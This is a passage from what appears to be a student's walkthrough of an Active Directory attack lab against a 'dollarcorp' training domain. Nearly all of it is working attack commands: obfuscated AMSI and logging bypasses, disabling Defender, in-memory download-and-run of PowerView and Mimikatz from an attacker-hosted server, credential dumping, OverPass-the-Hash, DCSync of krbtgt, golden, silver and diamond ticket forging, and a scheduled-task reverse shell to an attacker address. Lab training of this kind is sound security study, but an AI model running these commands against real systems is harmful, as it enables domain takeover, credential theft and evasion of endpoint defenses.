517 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 518 | cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors 519 | ``` 520 | 521 | - Bypass **.NET AMSI Bypass** with the script below : 522 | 523 | ```powershell 524 | $ZQCUW = @" 525 | using System; 526 | using System.Runtime.InteropServices; 527 | public class ZQCUW { 528 | [DllImport("kernel32")] 529 | public static extern IntPtr GetProcAddress(IntPtr hModule, string 530 | procName); 531 | [DllImport("kernel32")] 532 | public static extern IntPtr LoadLibrary(string name); 533 | [DllImport("kernel32")] 534 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr 535 | dwSize, uint flNewProtect, out uint lpflOldProtect); 536 | } 537 | "@ 538 | Add-Type $ZQCUW 539 | $BBWHVWQ = 540 | [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('ams 541 | ;i.dll'))") 542 | $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, 543 | "$([systeM.neT.webUtility]::HtMldECoDE('AmsiSca 544 | ;nBuffer'))") 545 | $p = 0 546 | [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p) 547 | $TLML = "0xB8" 548 | $PURX = "0x57" 549 | $YNWL = "0x00" 550 | $RTGX = "0x07" 551 | $XVON = "0x80" 552 | $WRUD = "0xC3" 553 | $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD) 554 | [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6) 555 | ``` 556 | 557 | 558 | - Start BloodHound collector, to gather data 559 | 560 | 561 | ```powershell 562 | . .\SharpHound.ps1 563 | Invoke-BloodHound -CollectionMethod All -Verbose 564 | ``` 565 | 566 | 567 | 568 | - Navigate to the bloodhound collector directory on the GUI 569 | 570 | ``` 571 | Location: 572 | 573 | C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors 574 | ``` 575 | 576 | 577 | 578 | - You should see a zip file, drag and drop it to bloodhound UI 579 | 580 | 581 | ![](https://i.imgur.com/9Wd253Y.png) 582 | 583 | 584 | 585 | 586 | 587 | ### **BloodHound Old Setup** 588 | 589 | 590 | **The latest version of BloodHound (4.2.0) does not show Derivate Local Admin edge in GUI. The last version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the same way as above.** 591 | 592 | - Make sure the **neo4j** UI is still turned off, but you can turn off the newer bloodhound 593 | - Change directory to the old bloodhound using MS-DOS and start up bloodhound 594 | 595 | 596 | ```powershell 597 | cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64 598 | .\BloodHound.exe 599 | ``` 600 | 601 | 602 | - Now since we have local administrator privileges, go ahead and turn off antivirus (Both **Real time protection** and **Tamper Protection**) using GUI 603 | - Open another powershell session with local administrative privileges and load **Invisi-shell** 604 | 605 | 606 | ```powershell 607 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 608 | cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-master\Collectors 609 | ``` 610 | 611 | - Bypass **.NET AMSI Bypass** with the script below : 612 | 613 | ```powershell 614 | $ZQCUW = @" 615 | using System; 616 | using System.Runtime.InteropServices; 617 | public class ZQCUW { 618 | [DllImport("kernel32")] 619 | public static extern IntPtr GetProcAddress(IntPtr hModule, string 620 | procName); 621 | [DllImport("kernel32")] 622 | public static extern IntPtr LoadLibrary(string name); 623 | [DllImport("kernel32")] 624 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr 625 | dwSize, uint flNewProtect, out uint lpflOldProtect); 626 | } 627 | "@ 628 | Add-Type $ZQCUW 629 | $BBWHVWQ = 630 | [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('ams 631 | ;i.dll'))") 632 | $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, 633 | "$([systeM.neT.webUtility]::HtMldECoDE('AmsiSca 634 | ;nBuffer'))") 635 | $p = 0 636 | [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p) 637 | $TLML = "0xB8" 638 | $PURX = "0x57" 639 | $YNWL = "0x00" 640 | $RTGX = "0x07" 641 | $XVON = "0x80" 642 | $WRUD = "0xC3" 643 | $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD) 644 | [System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6) 645 | ``` 646 | 647 | 648 | - Start BloodHound collector, to gather data 649 | 650 | 651 | ```powershell 652 | . .\SharpHound.ps1 653 | Invoke-BloodHound -CollectionMethod All 654 | ``` 655 | 656 | 657 | 658 | - Now clear the database if there is any data available from the old bloodhound UI 659 | - Navigate to the bloodhound collector directory on the GUI and drag and drop the zip file to Bloodhound_old UI 660 | 661 | ``` 662 | Location: 663 | 664 | C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-master\Collectors 665 | ``` 666 | 667 | 668 | 669 | ### **Shortest path to Domain Admins in the dollarcorp domain - bloodhound** 670 | 671 | 672 | 673 | 674 | **Note -: This can only be done with old bloodhound UI** 675 | 676 | 677 | - In Node Info, scroll down to '**LOCAL ADMIN RIGHTS**' and expand '**Derivative Local Admin Rights**' to find if studentx has derivate local admin rights on any machine! 678 | 679 | 680 | ![](https://i.imgur.com/zkLtx5h.png) 681 | 682 | 683 | 684 | - As we can see below `student505` is a member of `RDPUSERS` group and `RDPUSERS` is Admin To `DCORP-ADMINSRV` DC 685 | 686 | 687 | ![](https://i.imgur.com/n31oOzy.png) 688 | 689 | 690 | - This means that if we run - `winrs -r:dcorp-adminsrv cmd` - we can actually be domain admin 691 | 692 | 693 | ![](https://i.imgur.com/RHI3YZd.png) 694 | 695 | 696 | 697 | # **Lateral Movement - 1. Using dcorp-ci** 698 | 699 | 700 | > [!bug] **Learning Objective 7** 701 | > - Identify a machine in the target domain where a Domain Admin session is available. 702 | > - Compromise the machine and escalate privileges to Domain Admin 703 | > - Using access to `dcorp-ci` 704 | > - Using derivative local admin 705 | > # Solution -: 706 | 707 | 708 | 709 | ### **Step 1 - Identify a machine in the target domain where a Domain Admin session is available.** 710 | 711 | 712 | Remember we got access to `dcorp\ciadmin` via the Jenkins instance, we can use this domain user to enumerate more domain admin session is available, Go ahead and get reverse shell with Jenkins again ☹️ 713 | 714 | 715 | ![](https://i.imgur.com/z0Fu3jR.png) 716 | 717 | 718 | - First, we must bypass AMSI and enhanced logging. 719 | - The below command bypasses Enhanced Script Block Logging 720 | - Make sure to setup **HFS** and host the `sbloggingbypass.txt` for this 721 | 722 | ```powershell 723 | iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing) 724 | ``` 725 | 726 | 727 | ![](https://i.imgur.com/6KibfHl.png) 728 | 729 | 730 | - Bypass AMSI 731 | 732 | ```powershell 733 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 734 | ``` 735 | 736 | 737 | 738 | - Download and execute PowerView in memory of the reverse shell 739 | - Make sure to setup **HFS** for this also, hosting the `PowerView.ps1` script 740 | 741 | 742 | ```powershell 743 | iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1')) 744 | ``` 745 | 746 | 747 | - Then run this command to find **domain admin session** 748 | - Note that this might take a lot of time, so wait!! 🤣 749 | 750 | 751 | ```powershell 752 | Find-DomainUserLocation 753 | ``` 754 | 755 | 756 | ![](https://i.imgur.com/mgNGQFW.png) 757 | 758 | 759 | - Great! There is a domain admin session on dcorp-mgmt server 760 | 761 | > **Note** -: If you don't get result within 4 minutes hit the **Enter** key on your keyboard twice you should see output, hence, keep waiting till something comes up 762 | 763 | 764 | 765 | ### **Step 2 - Abuse using winrs** 766 | 767 | 768 | **Let’s check if we can execute commands on dcorp-mgmt server and if the winrm port is open:** 769 | 770 | 771 | ```powershell 772 | winrs -r:dcorp-mgmt hostname;whoami 773 | ``` 774 | 775 | 776 | ![](https://i.imgur.com/wBUPKu0.png) 777 | 778 | 779 | 780 | **Once this is confirmed we can go ahead and run SafetyKatz.exe on dcorp-mgmt to extract credentials from it** -: 781 | 782 | 783 | 784 | - download `Loader.exe` on **dcorp-ci** and copy it from there to **dcorp-mgmt** 785 | 786 | 787 | 788 | ```powershell 789 | iwr http://172.16.100.x/Loader.exe -OutFile C:\Users\Public\Loader.exe 790 | ``` 791 | 792 | 793 | 794 | - Copy the `Loader.exe` to **dcorp-mgmt**: 795 | 796 | 797 | 798 | ```powershell 799 | echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe 800 | ``` 801 | 802 | 803 | **_Right Output -:_** 804 | 805 | 806 | ![](https://i.imgur.com/oHkafUX.png) 807 | 808 | 809 | - Using `winrs`, add the following port forwarding on **dcorp-mgmt** to avoid detection on **dcorp-mgmt** 810 | 811 | 812 | ```powershell 813 | $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x" 814 | 815 | 816 | # $null - output redirection issues 817 | ``` 818 | 819 | 820 | - Use `Loader.exe` to download and execute `SafetyKatz.exe` in-memory on **dcorp-mgmt** 821 | - Make sure to host `SafetyKatz.exe` on **HFS** 822 | 823 | 824 | ```powershell 825 | $null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit 826 | ``` 827 | 828 | 829 | **_Right Output -:_** 830 | 831 | 832 | ![](https://i.imgur.com/d620Z2B.png) 833 | 834 | 835 | 836 | > We got credentials of svcadmin - a domain administrator. Note that **svcadmin** is used as a service account, so you can even get credentials in clear-text from lsasecrets! 837 | 838 | 839 | ![](https://i.imgur.com/d7iaV5E.png) 840 | 841 | 842 | **Incase you want to use Powershell Remoting instead of winrs, you can check out lab manual** 843 | 844 | ### **Step 3 - OverPass-the-Hash Rubeus** 845 | 846 | 847 | We will use **OverPass-the-Hash**, to use svcadmin's credentials 848 | 849 | 850 | - Spawn an elevated shell from the student VM (**Run as Administrator**) 851 | 852 | ```powershell 853 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 854 | ``` 855 | 856 | - You should now see a new window/process come up 857 | - Try accessing the domain controller from the new process! 858 | 859 | 860 | ```powershell 861 | # To run command remotely 862 | winrs -r:dcorp-dc whoami 863 | 864 | # To get active shell 865 | winrs -r:dcorp-dc cmd 866 | ``` 867 | 868 | 869 | 870 | ![](https://i.imgur.com/gwUwl7h.png) 871 | 872 | 873 | 874 | # **Lateral Movement - 2. Using derivative local admin** 875 | 876 | 877 | 878 | **Remember when we use bloodhound to enumerate shortest path to domain admin and we got `dcorp-adminsrv`, Yeah that is who a derivative local admin is** 879 | 880 | - Load invisi-shell and AMSI bypass into your MS-DOS session 881 | 882 | 883 | ![](https://i.imgur.com/KDFf7s8.png) 884 | 885 | 886 | - find out the machines on which we have local admin privileges 887 | 888 | ```powershell 889 | cd C:\AD\Tools 890 | 891 | . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 892 | 893 | Find-PSRemotingLocalAdminAccess 894 | ``` 895 | 896 | 897 | **_Example -:_** 898 | 899 | 900 | ![](https://i.imgur.com/rDIDPEa.png) 901 | 902 | **We have local admin on the dcorp-adminsrv** 903 | 904 | 905 | 906 | - check if **Applocker** is configured on `dcorp-adminsrv` by querying **registry keys** 907 | 908 | ```powershell 909 | # spawn active shell on dcorp-adminsrv 910 | winrs -r:dcorp-adminsrv cmd 911 | 912 | # Query registry keys 913 | reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2 914 | ``` 915 | 916 | 917 | ![](https://i.imgur.com/IuN7laB.png) 918 | 919 | 920 | **We can go ahead and enumerate this registry keys to check if there is a policy that can favor us** 921 | 922 | 923 | ```powershell 924 | reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script 925 | 926 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454f-a263-2515c8796a5d 927 | ``` 928 | 929 | 930 | 931 | **_Example_** 932 | 933 | 934 | ![](https://i.imgur.com/2ajE9HQ.png) 935 | 936 | 937 | **We have got an interesting policy in \Script that allows everyone to run programs, Signed binaries and scripts located under "C:\ProgramFiles" That means, we can drop scripts in the Program Files directory there and execute them** 938 | 939 | - First, disable Windows Defender on the `dcorp-adminsrv` server ^2a8dec 940 | - Before this exit the `winrm` session and use `PS Remoting` 941 | 942 | 943 | ```powershell 944 | Enter-PSSession dcorp-adminsrv 945 | 946 | # Disable windows defender 947 | Set-MpPreference -DisableRealtimeMonitoring $true -Verbose 948 | ``` 949 | 950 | 951 | **_Example_** 952 | 953 | 954 | ![](https://i.imgur.com/zlZYDq2.png) 955 | 956 | 957 | 958 | ### **Step 1 - Create Invoke-MimiEx.ps1** 959 | 960 | 961 | - Create a copy of **Invoke-Mimi.ps1** and rename it to **Invoke-MimiEx.ps1**. 962 | - Open **Invoke-MimiEx.ps1** in PowerShell ISE (Right click on it and click Edit). 963 | - Add `Invoke-Mimi -Command '"sekurlsa::ekeys"'` to the end of the file. 964 | 965 | 966 | **_Example_** 967 | 968 | 969 | ![](https://i.imgur.com/OgF704m.png) 970 | 971 | 972 | 973 | - Open up a new Powershell session on student machine run the following command to transfer the `Invoke-Mimi.ps1` to **dcorp-adminsrv** 974 | 975 | 976 | 977 | ```powershell 978 | Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files' 979 | ``` 980 | 981 | 982 | - Confirm if the file has been transferred 983 | 984 | ```powershell 985 | [dcorp-adminsrv]: PS C:\Users\student505\Documents> cd 'C:\Program Files\' 986 | 987 | [dcorp-adminsrv]: PS C:\Program Files> ls 988 | 989 | [SNIP] 990 | -a---- 12/11/2023 2:45 PM 2070874 Invoke-MimiEx.ps1 991 | ``` 992 | 993 | 994 | - Run the modified mimikatz script on `dcorp-adminsrv` 995 | 996 | 997 | ```powershell 998 | [dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1 999 | ``` 1000 | 1001 | 1002 | > [!summary] **Here we find the credentials(secrets) of the `srvadmin`, `appadmin` and `websvc` users.** 1003 | 1004 | 1005 | 1006 | We will use **OverPass-the-Hash**, to use **srvadmin's** credentials using `SafetyKatz.exe` 1007 | 1008 | 1009 | - Spawn an elevated powershell from the student VM (**Run as Administrator**) 1010 | 1011 | 1012 | ```powershell 1013 | C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit" 1014 | ``` 1015 | 1016 | - You should now have a new process/shell 1017 | - Check if srvadmin has admin privileges on any other machine. 1018 | 1019 | 1020 | ```powershell 1021 | # Load invisi-shell 1022 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1023 | 1024 | . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 1025 | Find-PSRemotingLocalAdminAccess -Verbose 1026 | ``` 1027 | 1028 | 1029 | **_Example_** 1030 | 1031 | 1032 | 1033 | ![](https://i.imgur.com/EuTNkRr.png) 1034 | 1035 | 1036 | **Hell yeah, we discovered a new machine `dcorp-mgmt`** 1037 | 1038 | ### **Step 2 - SafetyKatz for extracting credentials** 1039 | 1040 | 1041 | - Copy the `Loader.exe` to **dcorp-mgmt**: 1042 | 1043 | 1044 | ```powershell 1045 | echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe 1046 | ``` 1047 | 1048 | 1049 | 1050 | - Extract Credentials 1051 | - Make sure to host `SafetyKatz.exe` on **HFS** before running this command 1052 | 1053 | ```powershell 1054 | winrs -r:dcorp-mgmt cmd 1055 | 1056 | # Launch powershell 1057 | powershell 1058 | 1059 | # Enable port Forwarding 1060 | $null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x" 1061 | 1062 | # Extract Credentials 1063 | C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit 1064 | ``` 1065 | 1066 | 1067 | **You could also use `Powershell Remoting`, As shown below** 1068 | 1069 | 1070 | ### **Step 2.1 - Using PS-Remoting** 1071 | 1072 | 1073 | - Note that you have to exit from the 2 previous session by using the `exit` command twice before running the command below 1074 | 1075 | ```powershell 1076 | # Connect via PS-Remoting 1077 | Enter-PSSession -ComputerName dcorp-mgmt 1078 | ``` 1079 | 1080 | 1081 | - Load AMSI Bypass 1082 | - Download and Execute Invoke-Mimikatz as follows 1083 | 1084 | ```powershell 1085 | iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing) 1086 | ``` 1087 | 1088 | - Extract Credentials 1089 | 1090 | ```powershell 1091 | # Extract Credentials 1092 | Invoke-Mimi -Command '"sekurlsa::ekeys"' 1093 | 1094 | # Extract Credentials From Credentials Vault 1095 | Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"' 1096 | ``` 1097 | 1098 | 1099 | ### **Step 3 - OverPass-the-Hash Rubeus** 1100 | 1101 | - Spawn an elevated shell from the student VM (**Run as Administrator**) 1102 | 1103 | ```powershell 1104 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1105 | ``` 1106 | 1107 | 1108 | - You should now see a new window/process come up as `svcadmin`, Run `klist` to confirm 1109 | - Try accessing the domain controller from the new process! 1110 | 1111 | 1112 | ```powershell 1113 | # To run command remotely 1114 | winrs -r:dcorp-dc whoami 1115 | 1116 | # To get active shell 1117 | winrs -r:dcorp-dc cmd 1118 | ``` 1119 | 1120 | 1121 | 1122 | **_Things To Note Down_** 1123 | 1124 | - [ ] `aes256_hmac` is Mostly used for **OverPass-The-Hash** attack 1125 | - [ ] **NTLM Hash** is called `rc4_hmac_nt` 1126 | - [ ] To solve the question `Process using svcadmin as service account` -: 1127 | - You have to `winrs` into **dcorp-mgmt** after getting user `svcadmin` 1128 | - Then run `tasklist /svc` to view processes 1129 | - You should see `sqlsevr.exe`, The answer is definitely **sqlserver** 1130 | 1131 | 1132 | 1133 | # **Domain Persistence** 1134 | 1135 | > [!bug] **Learning Objective 8** 1136 | > - Extra secrets from the domain controller of dollarcorp. 1137 | > - Using the secrets of `krbtgt` account, create a golden ticket. 1138 | > - Use the Golden ticket to (once again) get domain admin privileges from a machine 1139 | > # Solution -: 1140 | 1141 | ### **Extract secrets from the domain controller of dollarcorp** 1142 | 1143 | 1144 | - First of all spawn an elevated **MS-DOS** session and start a process with Domain Admin privileges. 1145 | 1146 | 1147 | ```powershell 1148 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1149 | ``` 1150 | 1151 | - From the new process, copy `Loader.exe` on **dcorp-dc** and use it to extract credentials 1152 | 1153 | 1154 | ```powershell 1155 | # Copy Loader.exe to DC 1156 | echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y 1157 | 1158 | # Spawn interactive shell 1159 | winrs -r:dcorp-dc cmd 1160 | 1161 | # Set up port forwarding 1162 | netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x 1163 | 1164 | # Extract Credentials 1165 | # make sure to setup HFS first and host SafetyKatz.exe 1166 | C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe 1167 | 1168 | # Run this command on the mimikatz session 1169 | lsadump::lsa /patch 1170 | 1171 | # Take Note of the "Domain :" output 1172 | # This is the Domain SID that would be use often 1173 | ``` 1174 | 1175 | 1176 | 1177 | **_Example_** 1178 | 1179 | 1180 | ![](https://i.imgur.com/Wj7mI2N.png) 1181 | 1182 | 1183 | 1184 | ### **Using the secrets of krbtgt account, create a Golden ticket.** 1185 | 1186 | 1187 | - To get NTLM hash and AES keys of the krbtgt{or other users} account, we can use the DCSync attack 1188 | 1189 | - Run the below command from process running as Domain Admin 1190 | 1191 | 1192 | ```powershell 1193 | # Exit mimikatz 1194 | exit 1195 | exit 1196 | 1197 | # Extracts Credentials 1198 | C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" 1199 | 1200 | # Important Output -: 1201 | Hash NTLM: 1202 | aes256_hmac 1203 | aes128_hmac 1204 | ``` 1205 | 1206 | 1207 | - We can then use `BetterSafetyKatz.exe` to create a Golden ticket using the **aes256_hmac** key from last output 1208 | 1209 | - Run the below command from an elevated command prompt 1210 | 1211 | ```powershell 1212 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 1213 | ``` 1214 | 1215 | 1216 | - Now you should be administrator on `dcorp-dc` 1217 | - Run `klist` to confirm 1218 | 1219 | ![](https://i.imgur.com/LhaskQI.png) 1220 | 1221 | 1222 | - You should now be able to run commands remotely 1223 | 1224 | ```powershell 1225 | dir \\dcorp-dc\c$ 1226 | 1227 | # run WMI commands on the DC 1228 | powershell 1229 | gwmi -Class win32_computersystem -ComputerName dcorp-dc 1230 | ``` 1231 | 1232 | 1233 | **_Example_** 1234 | 1235 | 1236 | ![](https://i.imgur.com/btWJLpq.png) 1237 | 1238 | 1239 | ### **Getting Command Execution on domain controller, creating a silver ticket** 1240 | 1241 | 1242 | > [!bug] **Learning Objective 9** 1243 | > - During the additional lab time: 1244 | > - Try to get command execution on the domain controller by creating silver tickets for: 1245 | > - HOST service 1246 | > - WMI 1247 | > # Solution -: 1248 | 1249 | 1250 | ### **Step 1 - Craft Silver Ticket (HOST Service)** 1251 | 1252 | 1253 | - First of extract secrets as shown earlier and note the output down 1254 | - Now start up `mimikatz.exe` 1255 | 1256 | ```powershell 1257 | cd \AD\Tools 1258 | .\mimikatz.exe 1259 | ``` 1260 | 1261 | 1262 | - Then run the command below replacing `/rc4` with **DCORP-DC$** NTLM and `/sid` with the **Domain :** output from the secret we extracted earlier 1263 | 1264 | ```powershell 1265 | kerberos::golden /user:Administrator /rc4:f5a2cef076a16742b123b8ed07c372c1 /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /domain:dollarcorp.moneycorp.local /service:HOST /startoffset:0 /endin:600 /renewmax:10080 /ptt 1266 | 1267 | # /sid: - Domain SID 1268 | # /rc4: - DCORP-DC$ NTLM 1269 | ``` 1270 | 1271 | 1272 | - Then run the command below to know if you have permissions to viewing scheduling task 1273 | 1274 | ```powershell 1275 | exit 1276 | schtasks /S dcorp-dc.dollarcorp.moneycorp.local 1277 | 1278 | 1279 | 1280 | <> 1281 | [SNIP] 1282 | TaskName Next Run Time Status 1283 | ============================= ====== =============== 1284 | Device Install Group Policy N/A Ready 1285 | Device Install Reboot Required N/A Ready 1286 | Sysprep Generalize Drivers N/A Ready 1287 | 1288 | Folder: \Microsoft\Windows\Power Efficiency Diagnostics 1289 | TaskName Next Run Time Status 1290 | ===================== ============== =============== 1291 | AnalyzeSystem N/A Ready 1292 | 1293 | Folder: \Microsoft\Windows\PushToInstall 1294 | TaskName Next Run Time Status 1295 | ============= ====================== =============== 1296 | LoginCheck N/A Disabled 1297 | Registration N/A Disabled 1298 | 1299 | Folder: \Microsoft\Windows\Ras 1300 | TaskName Next Run Time Status 1301 | ============= ====================== =============== 1302 | MobilityManager N/A Ready 1303 | [SNIP] 1304 | ``` 1305 | 1306 | **Note That if you get an "Error: Access is denied", you probably did the wrong thing** 1307 | 1308 | 1309 | ### **Step 2 - Gain Reverse Shell** 1310 | 1311 | 1312 | - [ ] **_Create Invoke-PowerShellTcpEx.ps1:_** 1313 | 1314 | - Create a copy of **Invoke-PowerShellTcp.ps1** and rename it to **Invoke-PowerShellTcpEx.ps1**. 1315 | 1316 | - Open **Invoke-PowerShellTcpEx.ps1** in PowerShell ISE 1317 | 1318 | - Add - `Power -Reverse -IPAddress 172.16.100.X -Port 443` - to the end of the file and save. 1319 | 1320 | 1321 | 1322 | 1323 | ![](https://i.imgur.com/4aXmJlD.png) 1324 | 1325 | 1326 | 1327 | 1328 | - Now host the newly created **Invoke-PowerShellTcpEx.ps1** on **HFS** 1329 | - Start up your reverse shell on another new `MS-DOS` session 1330 | 1331 | 1332 | 1333 | ```powershell 1334 | C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 1335 | ``` 1336 | 1337 | 1338 | 1339 | 1340 | - On the same session where we crated our **silver ticket** run this 1341 | 1342 | 1343 | ```powershell 1344 | # Create scheduled task 1345 | schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "sec-fortress" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'" 1346 | 1347 | # Start scheduled task 1348 | schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "sec-fortress" 1349 | ``` 1350 | 1351 | 1352 | **_Example_** 1353 | 1354 | 1355 | ![](https://i.imgur.com/2uJ6umQ.png) 1356 | 1357 | > All of this is for the `/service:HOST`, now let also look at `/service:RPCSS` 1358 | 1359 | ### **Craft Silver Ticket (WMI Service)** 1360 | 1361 | **For accessing `WMI`, we need to create two tickets - one for `HOST` service and another for `RPCSS`.** 1362 | 1363 | - Run the below commands from an elevated shell: 1364 | 1365 | 1366 | ```powershell 1367 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 1368 | 1369 | 1370 | # Then confirm if you have access to scheduled task 1371 | schtasks /S dcorp-dc.dollarcorp.moneycorp.local 1372 | ``` 1373 | 1374 | 1375 | - Inject a ticket for `RPCSS`: 1376 | 1377 | ```powershell 1378 | C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" 1379 | ``` 1380 | 1381 | - Check if the tickets are present, **_Desired Output -:_** 1382 | 1383 | ```powershell 1384 | klist 1385 | ``` 1386 | 1387 | ![](https://i.imgur.com/IRLpTXp.png) 1388 | 1389 | 1390 | 1391 | - Now, try running `WMI` commands on the domain controller: 1392 | 1393 | 1394 | ```powershell 1395 | # Spawn invisi-shell 1396 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1397 | 1398 | # Run command on DC 1399 | Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc 1400 | ``` 1401 | 1402 | 1403 | **_Example_** 1404 | 1405 | 1406 | 1407 | ![](https://i.imgur.com/vDOFHbG.png) 1408 | 1409 | 1410 | 1411 | ### **Executing the Diamond Ticket attack.** 1412 | 1413 | 1414 | > [!bug] **Learning Objective 10** 1415 | > - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack. 1416 | > # Solution -: 1417 | 1418 | 1419 | **We can simply use the following `Rubeus` command to execute the attack. Note that the command needs to be run from an elevated shell (Run as administrator):** 1420 | 1421 | 1422 | ```powershell 1423 | C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1424 | 1425 | # krbkey is the same as aes256_hmac 1426 | # You can use the DCsync attack to get the information 1427 | # checkout golden ticket to know more about it 1428 | ``` 1429 | 1430 | 1431 | 1432 | - Access the DC using `winrs` from the new spawned process! 1433 | 1434 | 1435 | ```powershell 1436 | winrs -r:dcorp-dc cmd 1437 | ``` 1438 | 1439 | 1440 | **_Example_** 1441 | 1442 | 1443 | 1444 | ![](https://i.imgur.com/QexYfSz.png) 